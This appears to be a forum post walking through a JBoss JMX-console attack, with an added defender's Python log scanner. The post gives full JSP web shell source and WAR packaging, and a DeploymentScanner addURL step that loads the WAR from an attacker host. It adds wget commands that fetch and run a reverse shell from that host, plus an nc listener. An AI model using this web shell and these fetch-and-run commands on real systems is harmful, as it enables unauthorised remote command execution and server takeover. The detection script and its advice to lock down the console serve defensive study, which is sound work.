kekeke..
Step by Step
1) Browse to the target machine: http://mytargettest.com:8080
2) Click on JMX-CONSOLE; if you can see the page, that's great.
3) Now you need to create a WAR file containing our shell.
3.1) mkdir WEB-INF
3.2) vi cmd.jsp and insert this:
<%@ page import="java.util.*,java.io.*"%>
<%%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
  out.println("Command: " + request.getParameter("cmd") + "<BR>");
  Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
  OutputStream os = p.getOutputStream();
  InputStream in = p.getInputStream();
  DataInputStream dis = new DataInputStream(in);
  String disr = dis.readLine();
  while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
  }
}
%>
</pre>
</BODY></HTML>
3.3) vi WEB-INF/web.xml and insert this:
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>
3.4) Now package it: jar cvf cmd.war WEB-INF cmd.jsp
3.5) Move this file to your pentest web server; the target machine will need to download it from there.
4) Now browse to
http://mytargettest.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
5) Search for "void addURL()"
6) Insert the address of your WAR file, in my case http://172.16.1.79/exploits/cmd.war, and click INVOKE.
7) It will take about 1 min; then you can browse to your application: http://mytargettest.com:8080/cmd/cmd.jsp
8) Now you just need to type commands like "id". If you are not root, then you need to find an exploit to root the machine.
9) Meanwhile you can get a shell on the machine by doing this:
10) Download a reverse shell to the machine: wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell
11) chmod +x /tmp/airwolf_reverse_shell
12) Prepare your pentest machine to receive the reverse shell: nc -l -p 8080 -vvv
13) Run the reverse shell on the target machine: /tmp/airwolf_reverse_shell
14) You are now connected to the server.
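As an added defender's-side example (not part of the original post): a small Python script that reads Common Log Format access log lines from the JBoss web container and flags the sequence above as it shows up in the log: JMX console inspection, an invokeOp against the DeploymentScanner MBean carrying a remote URL argument, and later requests to a .jsp with a cmd parameter. The log lines are constructed for this example; the invokeOp query shape (action=invokeOp, name=..., methodIndex, arg0) is assumed to follow the HtmlAdaptor's form field names, and the hosts and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (Common Log Format). Not from the original post;
# the query strings mirror what the jmx-console HtmlAdaptor is assumed to emit.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2010:10:00:01 +0000] "GET /jmx-console/ HTTP/1.1" 200 4120
10.0.0.5 - - [12/Mar/2010:10:00:07 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL HTTP/1.1" 200 9811
10.0.0.5 - - [12/Mar/2010:10:00:30 +0000] "POST /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment:type=DeploymentScanner,flavor=URL&methodIndex=17&arg0=http://172.16.1.79/exploits/cmd.war HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2010:10:01:45 +0000] "GET /cmd/cmd.jsp?cmd=id HTTP/1.1" 200 233
10.0.0.5 - - [12/Mar/2010:10:02:10 +0000] "GET /cmd/cmd.jsp?cmd=wget%20-P%20/tmp%20http://172.16.1.79/exploits/airwolf_reverse_shell HTTP/1.1" 200 410
192.168.1.20 - - [12/Mar/2010:10:03:00 +0000] "GET /myapp/index.jsp HTTP/1.1" 200 1200
"""

# client, timestamp, method, request target and status from one CLF line
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Split a CLF line into its fields; return None for lines that do not match."""
    m = CLF_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs splits on the first '=' only, so MBean names containing '=' survive intact
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": parts.path,
        "query": query,
        "status": int(m.group("status")),
    }


def classify(req):
    """Return a list of (severity, reason) findings for one parsed request."""
    findings = []
    path, q = req["path"], req["query"]

    if path.startswith("/jmx-console/"):
        action = q.get("action", "")
        if action == "invokeOp":
            why = "JMX operation invoked through HtmlAdaptor"
            mbean = q.get("name", "")
            # any argN value that is a URL: the deployer is being pointed at a remote archive
            url_args = [v for k, v in q.items()
                        if k.startswith("arg") and v.lower().startswith(("http://", "https://", "file:"))]
            if "DeploymentScanner" in mbean and url_args:
                why = "remote archive deployment via DeploymentScanner (addURL-style) from " + url_args[0]
            findings.append(("high", why))
        elif action:
            findings.append(("medium", "JMX console MBean inspection: action=" + action))
        else:
            findings.append(("low", "JMX console accessed"))

    # a JSP taking a 'cmd' parameter is the signature of the web shell deployed above
    if path.endswith(".jsp") and "cmd" in q:
        findings.append(("high", "possible web shell command on %s: %s" % (path, q["cmd"])))
    return findings


def scan(log_text):
    """Run classify() over every parseable line and return the alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if not req:
            continue
        for sev, why in classify(req):
            alerts.append({"ip": req["ip"], "ts": req["ts"], "path": req["path"],
                           "severity": sev, "reason": why})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print("%-6s %s %s %s" % (a["severity"], a["ts"], a["ip"], a["reason"]))
```

On the sample input the script raises one low, one medium and three high alerts, all from the same client, which is the pattern to correlate on: console inspection followed within minutes by an invokeOp with a URL argument and then requests to a context that did not exist before. The log-based check is only a backstop; the durable fix for this class of deployment is to keep the JMX console (and the web console and invoker servlets) off any network a stranger can reach, or to protect it with a security-constraint in its web.xml so that HtmlAdaptor requires authentication.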
Now r0x d4 n3tw0rk
nice one masta =)